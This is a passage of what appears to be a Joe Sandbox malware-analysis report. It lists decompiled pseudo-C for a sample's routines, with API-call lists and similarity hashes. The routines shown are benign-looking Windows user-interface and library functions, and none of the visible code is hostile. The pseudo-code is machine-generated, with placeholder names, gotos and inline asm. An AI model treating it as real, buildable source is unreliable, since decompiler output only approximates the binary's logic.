                                            					DestroyCursor( *_t40);
                                            				}
                                            				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                                            				E00419C1F(_t43 + 0x78);
                                            				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
                                            				_t21 = E0041AD27(_t43);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                            				return _t21;
                                            			}









                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00426CBF
                                            • LoadCursorA.USER32 ref: 00426D29
                                            • SetCursor.USER32(00000000), ref: 00426D30
                                            • DestroyCursor.USER32(00000000), ref: 00426D38
                                              • Part of subcall function 004288AC: __EH_prolog.LIBCMT ref: 004288B1
                                              • Part of subcall function 004288AC: DeleteDC.GDI32(?), ref: 004288D2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Cursor$H_prolog$DeleteDestroyLoad
                                            • String ID:
                                            • API String ID: 2398634004-0
                                            • Opcode ID: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
                                            • Instruction ID: 779aaf76a531418baa36e2a5a867f58700d8f9a93bf22c0d14db93a2c62a59f0
                                            • Opcode Fuzzy Hash: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
                                            • Instruction Fuzzy Hash: A511E031300600DBE735AF65E806BEEBBA5EF44714F50012FE16697291CBB82981CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00414E0D(struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                            				void* __ebp;
                                            				struct HWND__* _t10;
                                            				void* _t12;
                                            				struct HWND__* _t16;
                                            				struct HWND__* _t17;
                                            				void* _t18;
                                            
                                            				_t16 = GetDlgItem(_a4, _a8);
                                            				if(_t16 == 0) {
                                            					L6:
                                            					_t10 = GetTopWindow(_a4);
                                            					while(1) {
                                            						_t17 = _t10;
                                            						if(_t17 == 0) {
                                            							break;
                                            						}
                                            						_t12 = E00414E0D(_t17, _a8, _a12);
                                            						if(_t12 == 0) {
                                            							_t10 = GetWindow(_t17, 2);
                                            							continue;
                                            						}
                                            						goto L11;
                                            					}
                                            					return 0;
                                            				} else {
                                            					if(GetTopWindow(_t16) == 0) {
                                            						L3:
                                            						_push(_t16);
                                            						if(_a12 == 0) {
                                            							return E00413740(_t18);
                                            						}
                                            						_t12 = E00413767();
                                            						if(_t12 == 0) {
                                            							goto L6;
                                            						}
                                            					} else {
                                            						_t12 = E00414E0D(_t16, _a8, _a12);
                                            						if(_t12 == 0) {
                                            							goto L3;
                                            						}
                                            					}
                                            				}
                                            				L11:
                                            				return _t12;
                                            			}










                                            APIs
                                            • GetDlgItem.USER32 ref: 00414E18
                                            • GetTopWindow.USER32(00000000), ref: 00414E2B
                                            • GetTopWindow.USER32(?), ref: 00414E5B
                                            • GetWindow.USER32(00000000,00000002), ref: 00414E76
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$Item
                                            • String ID:
                                            • API String ID: 369458955-0
                                            • Opcode ID: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
                                            • Instruction ID: 713c4843e211392e89bb80c14a0a22a2ce3b3a0133c9697a1d0cdd1df30717b3
                                            • Opcode Fuzzy Hash: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
                                            • Instruction Fuzzy Hash: 3601DF3620031AA7CF222FA1DC04FDF3B19BF907A8B058022FD1095220D73AD99286ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E00414E86(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                                            				void* __ebp;
                                            				struct HWND__* _t16;
                                            				void* _t20;
                                            				void* _t22;
                                            				struct HWND__* _t24;
                                            
                                            				_t22 = __edx;
                                            				_t16 = GetTopWindow(_a4);
                                            				while(1) {
                                            					_t24 = _t16;
                                            					if(_t24 == 0) {
                                            						break;
                                            					}
                                            					if(_a24 == 0) {
                                            						SendMessageA(_t24, _a8, _a12, _a16);
                                            					} else {
                                            						_push(_t24);
                                            						_t20 = E00413767();
                                            						if(_t20 != 0) {
                                            							_push(_a16);
                                            							_push(_a12);
                                            							_push(_a8);
                                            							_push( *((intOrPtr*)(_t20 + 0x1c)));
                                            							_push(_t20);
                                            							E0041357F(_t22);
                                            						}
                                            					}
                                            					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
                                            						E00414E86(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
                                            					}
                                            					_t16 = GetWindow(_t24, 2);
                                            				}
                                            				return _t16;
                                            			}









                                            APIs
                                            • GetTopWindow.USER32(?), ref: 00414E94
                                            • SendMessageA.USER32(00000000,?,?,?), ref: 00414ECA
                                            • GetTopWindow.USER32(00000000), ref: 00414ED7
                                            • GetWindow.USER32(00000000,00000002), ref: 00414EF5
                                            Similarity
                                            • API ID: Window$MessageSend
                                            • String ID:
                                            • API String ID: 1496643700-0
                                            • Opcode ID: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
                                            • Instruction ID: 3d1463f18b92dc59c4e8e68b3c1d5ad38cebe4dbe95d796ae8901b7c7719fd47
                                            • Opcode Fuzzy Hash: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
                                            • Instruction Fuzzy Hash: 9901E93210021ABBCF226F959C04EDF3B2ABF85395F448016FA1055161C73AD9B2EFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00412FC3(void* __ecx, void* __ebp, signed int _a4) {
                                            				intOrPtr _t16;
                                            				int _t17;
                                            				void* _t20;
                                            				struct HWND__* _t26;
                                            				intOrPtr _t35;
                                            				void* _t36;
                                            
                                            				_t37 = __ebp;
                                            				_t36 = __ecx;
                                            				_t16 =  *((intOrPtr*)(__ecx + 0xc));
                                            				if(_t16 == 0) {
                                            					if(_a4 == 0) {
                                            						_t35 =  *((intOrPtr*)(__ecx + 0x14));
                                            						if(GetFocus() ==  *(_t35 + 0x1c)) {
                                            							_t20 = E00413740(__ebp, GetParent( *(_t35 + 0x1c)));
                                            							_t26 =  *(_t36 + 0x14);
                                            							if(_t26 != 0) {
                                            								_t26 =  *(_t26 + 0x1c);
                                            							}
                                            							E004166F5(E00413740(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
                                            						}
                                            					}
                                            					_t17 = E004166CE( *(_t36 + 0x14), _a4);
                                            					L9:
                                            					 *((intOrPtr*)(_t36 + 0x18)) = 1;
                                            					return _t17;
                                            				}
                                            				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
                                            					return _t16;
                                            				}
                                            				asm("sbb ecx, ecx");
                                            				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
                                            				goto L9;
                                            			}










                                            APIs
                                            Similarity
                                            • API ID: Item$EnableFocusMenuNextParent
                                            • String ID:
                                            • API String ID: 988757621-0
                                            • Opcode ID: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
                                            • Instruction ID: 99040edbaee9cc6ce9264ed7bff9ba50270304a60b21238e3b9e9fd35de4f38b
                                            • Opcode Fuzzy Hash: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
                                            • Instruction Fuzzy Hash: 30117071200600ABCB389F21D859B9BBBB5EF44715F104A2EF142861A1CB79F9C68B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00428D0F(intOrPtr* __ecx, int _a4) {
                                            				struct HDC__* _t8;
                                            				int _t16;
                                            				void* _t18;
                                            				void* _t21;
                                            				intOrPtr* _t22;
                                            
                                            				_t16 = _a4;
                                            				_t22 = __ecx;
                                            				_t21 = GetStockObject(_t16);
                                            				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
                                            					_t8 =  *(_t22 + 4);
                                            					if(_t8 != 0) {
                                            						SelectObject(_t8, _t21);
                                            					}
                                            					_push(SelectObject( *(_t22 + 8), _t21));
                                            					return E0041A5FC();
                                            				} else {
                                            					_push(SelectObject( *(_t22 + 8), _t21));
                                            					_t18 = E0041A5FC();
                                            					if( *(_t22 + 0x2c) != _t21) {
                                            						 *(_t22 + 0x2c) = _t21;
                                            						E00428D7F(_t22);
                                            					}
                                            					return _t18;
                                            				}
                                            			}









                                            APIs
                                            • GetStockObject.GDI32(?), ref: 00428D19
                                            • SelectObject.GDI32(?,00000000), ref: 00428D39
                                            • SelectObject.GDI32(?,00000000), ref: 00428D6B
                                            • SelectObject.GDI32(?,00000000), ref: 00428D71
                                            Similarity
                                            • API ID: Object$Select$Stock
                                            • String ID:
                                            • API String ID: 3337941649-0
                                            • Opcode ID: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
                                            • Instruction ID: d553f3ff55a9007d7633e8bfee77d88ccc27de806737e89093267e5a4cde492b
                                            • Opcode Fuzzy Hash: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
                                            • Instruction Fuzzy Hash: 5EF081717127206B9A305A66ECC9C2FB6BCDAA5384380482FF505C2261CE3CDC868A6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004253EE(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                            				signed short _t21;
                                            				void* _t37;
                                            
                                            				_t37 = __ecx;
                                            				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                                            					 *(_t37 + 0x90) = _a4;
                                            					 *(_t37 + 0x94) = _a8;
                                            					 *(_t37 + 0x88) = _a12;
                                            					_t21 = _a16;
                                            					 *(_t37 + 0x8c) = _t21;
                                            					return _t21;
                                            				}
                                            				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                            				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                            				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                                            			}






                                            APIs
                                            • IsWindow.USER32(0000E800), ref: 004253F7
                                            • SendMessageA.USER32(0000E800,00000420,00000000,?), ref: 00425420
                                            • SendMessageA.USER32(0000E800,0000041F,00000000,?), ref: 0042543A
                                            • InvalidateRect.USER32(0000E800,00000000,00000001,?,004253A6,?,?,?,?,ToolbarWindow32,00000000,?,?,00000800,0000E800,00000000), ref: 00425443
                                            Similarity
                                            • API ID: MessageSend$InvalidateRectWindow
                                            • String ID:
                                            • API String ID: 3225880595-0
                                            • Opcode ID: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
                                            • Instruction ID: f8499f2f8c5f873ffa7f07fa88986deb1236627fbfce6f7c18d287819d1ada54
                                            • Opcode Fuzzy Hash: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
                                            • Instruction Fuzzy Hash: 00015270200714AFE7209F29DC01BAAB7F4FB04740F50842AF995D6291D7B0F851DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041E24C(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
                                            				char _v20;
                                            				void* _t17;
                                            				long _t19;
                                            				void* _t27;
                                            				void* _t28;
                                            
                                            				_t27 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                            					wsprintfA( &_v20, "%d", _a12);
                                            					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
                                            				}
                                            				_t17 = E00425E7D(__ecx, _a4);
                                            				_t28 = _t17;
                                            				if(_t28 != 0) {
                                            					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
                                            					RegCloseKey(_t28);
                                            					return 0 | _t19 == 0x00000000;
                                            				}
                                            				return _t17;
                                            			}









                                            APIs
                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0041E278
                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0041E281
                                            • wsprintfA.USER32 ref: 0041E29D
                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0041E2B6
                                            Similarity
                                            • API ID: ClosePrivateProfileStringValueWritewsprintf
                                            • String ID:
                                            • API String ID: 1902064621-0
                                            • Opcode ID: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
                                            • Instruction ID: 5e7b0193fad4bb3573ee89de37fde3184d05d4c4fb691ea0876ecaf7c45fa68e
                                            • Opcode Fuzzy Hash: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
                                            • Instruction Fuzzy Hash: 39018F32500629ABCB226F64DC09FEB3BACEF04714F44442AFE15A61A1E774D9118BD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00424F9B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                            				char _v16;
                                            				int _t12;
                                            				signed int _t16;
                                            				int _t18;
                                            				intOrPtr _t19;
                                            				void* _t24;
                                            				intOrPtr* _t27;
                                            
                                            				_t19 = _a4;
                                            				_t27 = __ecx;
                                            				E0041F52D(__ecx, _t19, _a8);
                                            				_t12 = E00416528(__ecx);
                                            				if((_t12 & 0x00000001) != 0) {
                                            					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                                            					if(_t12 == 0) {
                                            						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
                                            						_t16 = GetSystemMetrics(5);
                                            						_t18 = GetSystemMetrics(2);
                                            						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                                            						return _t18;
                                            					}
                                            				}
                                            				return _t12;
                                            			}











                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetParent.USER32(0000E800), ref: 00424FC0
                                            • IsZoomed.USER32(00000000), ref: 00424FC7
                                            • GetSystemMetrics.USER32 ref: 00424FEF
                                            • GetSystemMetrics.USER32 ref: 00424FFD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$LongParentWindowZoomed
                                            • String ID:
                                            • API String ID: 3909876373-0
                                            • Opcode ID: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
                                            • Instruction ID: 3022547c35077017ae25d59748aa6c1922cda0f4cb055a75ef651f6ebc74021f
                                            • Opcode Fuzzy Hash: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
                                            • Instruction Fuzzy Hash: 1E0167327006146BDB106FB4DC49B8EB768EF44744F414169FA01AB195D774AC45CBD4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0040E3C9(void* __ecx) {
                                            				long _t1;
                                            				long _t3;
                                            				long _t8;
                                            				void* _t9;
                                            
                                            				_t1 =  *0x43a478; // 0x2
                                            				_t9 = __ecx;
                                            				_t8 = 2;
                                            				if(_t1 != _t8) {
                                            					__eflags = _t1;
                                            					if(_t1 != 0) {
                                            						while(1) {
                                            							L7:
                                            							__eflags =  *0x43a478 - 1;
                                            							if( *0x43a478 != 1) {
                                            								break;
                                            							}
                                            							Sleep(1);
                                            						}
                                            						__eflags =  *0x43a478 - _t8; // 0x2
                                            						if(__eflags != 0) {
                                            							L12:
                                            							return _t9;
                                            						}
                                            						L10:
                                            						_push(0x43a460);
                                            						L11:
                                            						EnterCriticalSection();
                                            						goto L12;
                                            					}
                                            					_t3 = InterlockedExchange(0x43a478, 1);
                                            					__eflags = _t3;
                                            					if(__eflags != 0) {
                                            						__eflags = _t3 - _t8;
                                            						if(_t3 == _t8) {
                                            							 *0x43a478 = _t8;
                                            						}
                                            						goto L7;
                                            					}
                                            					InitializeCriticalSection(0x43a460);
                                            					E00405626(__eflags, E0040E447);
                                            					 *0x43a478 = _t8;
                                            					goto L10;
                                            				}
                                            				_push(0x43a460);
                                            				goto L11;
                                            			}








                                            APIs
                                            • InterlockedExchange.KERNEL32(0043A478,00000001), ref: 0040E3F1
                                            • InitializeCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E3FC
                                            • EnterCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E43B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                            • String ID:
                                            • API String ID: 3643093385-0
                                            • Opcode ID: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
                                            • Instruction ID: 459bb49f379d993a17294b602fe23a8fc8c079e5ea63f72b552277febdb2dab9
                                            • Opcode Fuzzy Hash: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
                                            • Instruction Fuzzy Hash: AAF0F4303C03509AEA204772AC8D6263754E7A4365F605837F6C1E22D0C7FA4CB2476E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042146D(void* __ecx, void* _a4) {
                                            				int _v8;
                                            				char _v268;
                                            				void* __ebp;
                                            				void* _t15;
                                            				int _t19;
                                            				intOrPtr* _t23;
                                            				void* _t25;
                                            
                                            				E00413740(_t25, SetActiveWindow( *(__ecx + 0x1c)));
                                            				_t19 = 0;
                                            				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                                            				_t15 = E00424BFB();
                                            				_t23 =  *((intOrPtr*)(_t15 + 4));
                                            				if(_v8 > 0) {
                                            					do {
                                            						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
                                            						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
                                            						_t19 = _t19 + 1;
                                            					} while (_t19 < _v8);
                                            				}
                                            				DragFinish(_a4);
                                            				return _t15;
                                            			}











                                            APIs
                                            • SetActiveWindow.USER32(?), ref: 0042147C
                                            • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00421497
                                            • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004214B9
                                            • DragFinish.SHELL32(?), ref: 004214D2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                            • String ID:
                                            • API String ID: 892977027-0
                                            • Opcode ID: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
                                            • Instruction ID: d3b2b95128177b05ecd3e0cb6b2ffa69d247fd4355a1387cba143c8becacc0b5
                                            • Opcode Fuzzy Hash: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
                                            • Instruction Fuzzy Hash: C001AD71A00118BFCB10AFA4EC84CDE7BBDEF04368B50416AB554960A0CB74AE828BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004159DA(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                                            				long _v12;
                                            				void _v16;
                                            				intOrPtr _t12;
                                            				long _t16;
                                            				void* _t18;
                                            
                                            				if(_a4 == 0 || _a16 == 0) {
                                            					L10:
                                            					return 0;
                                            				} else {
                                            					_t12 = _a12;
                                            					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041A759(_a8, _t12) == 0) {
                                            						goto L10;
                                            					} else {
                                            						GetObjectA(_a16, 0xc,  &_v16);
                                            						SetBkColor(_a4, _v12);
                                            						_t16 = _a20;
                                            						if(_t16 == 0xffffffff) {
                                            							_t16 = GetSysColor(8);
                                            						}
                                            						SetTextColor(_a4, _t16);
                                            						_t18 = 1;
                                            						return _t18;
                                            					}
                                            				}
                                            			}









                                            APIs
                                            • GetObjectA.GDI32(00000000,0000000C,?), ref: 00415A18
                                            • SetBkColor.GDI32(00000000,00000000), ref: 00415A24
                                            • GetSysColor.USER32(00000008), ref: 00415A34
                                            • SetTextColor.GDI32(00000000,?), ref: 00415A3E
                                              • Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Color$LongObjectTextWindow
                                            • String ID:
                                            • API String ID: 2871169696-0
                                            • Opcode ID: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
                                            • Instruction ID: 5794cb577ca1faeaf387d8a9650f772c60ab8f78b3a0630a70f1c9da6bb06112
                                            • Opcode Fuzzy Hash: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
                                            • Instruction Fuzzy Hash: A1012830140609EFDF219FA4DD89BEB3B69EF80380F584622F912D41E0C774C9E5DA99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00423A6F(void* __ecx) {
                                            				void* __esi;
                                            				void* _t16;
                                            				void* _t28;
                                            				void* _t30;
                                            				intOrPtr _t32;
                                            				intOrPtr _t34;
                                            
                                            				E00406520(E0042A9EC, _t30);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t34 =  *0x439c44; // 0x1
                                            				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
                                            				_t28 = __ecx;
                                            				if(_t34 == 0) {
                                            					 *((intOrPtr*)(_t30 - 4)) = 0;
                                            					if( *(_t30 + 0xc) != 0) {
                                            						lstrcpyA(E00416D38(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
                                            					} else {
                                            						E00416A77(__ecx + 0xc8, __ecx);
                                            					}
                                            					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
                                            					_t16 = 1;
                                            				} else {
                                            					_t16 = E004136A7(__ecx);
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                            				return _t16;
                                            			}










                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00423A74
                                            • SendMessageA.USER32(?,00000085,00000000,00000000), ref: 00423AD2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prologMessageSend
                                            • String ID:
                                            • API String ID: 2337391251-0
                                            • Opcode ID: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
                                            • Instruction ID: 2aa457cf7095c193361f5c786731192497787529c17009fc52bec87f436ac3b9
                                            • Opcode Fuzzy Hash: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
                                            • Instruction Fuzzy Hash: 52018F72600210FECB219F52EC09AAF7B78FF94316F50853FF05655050CB795A42CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004297EF(void* __ecx) {
                                            				struct tagPOINT _v12;
                                            				struct tagPOINT _v20;
                                            				struct HDC__* _t19;
                                            
                                            				_t19 =  *(__ecx + 8);
                                            				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
                                            					GetViewportOrgEx(_t19,  &_v12);
                                            					E004298F1(__ecx,  &_v12);
                                            					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
                                            					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
                                            					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
                                            					GetWindowOrgEx( *(__ecx + 8),  &_v20);
                                            					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
                                            				}
                                            				return _t19;
                                            			}







                                            APIs
                                            • GetViewportOrgEx.GDI32(?,?), ref: 0042980A
                                              • Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
                                              • Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F
                                            • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00429832
                                            • GetWindowOrgEx.GDI32(?,?), ref: 0042983F
                                            • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00429850
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ViewportWindow
                                            • String ID:
                                            • API String ID: 1589084482-0
                                            • Opcode ID: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
                                            • Instruction ID: c39a85c19b382e653cd8ba5d99ea89e37b71820b7245054109fbca8261a50672
